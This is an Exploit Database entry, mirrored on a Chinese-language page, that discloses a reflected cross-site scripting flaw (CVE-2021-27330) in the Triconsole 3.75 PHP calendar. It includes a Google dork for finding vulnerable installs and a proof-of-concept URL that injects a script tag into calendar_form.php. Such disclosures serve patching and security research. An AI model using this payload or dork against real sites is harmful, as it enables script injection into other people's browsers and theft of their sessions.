Triconsole 3.75 – Reflected XSS

• Exploit Database
• 16 阅读

• 作者： Akash Chathoth
  日期： 2021-02-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49597/

• # Exploit Title: Triconsole 3.75 - Reflected XSS
  # Google Dork: inurl : /calendar/calendar_form.php
  # Date: 15/2/2021
  # Exploit Author: Akash Chathoth
  # Vendor Homepage: http://www.triconsole.com/
  # Software Link: http://www.triconsole.com/php/calendar_datepicker.php
  # Version: < 3.76 (14 February 2021)
  # Tested on: 3.75
  # CVE: 2021-27330
  
  # Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>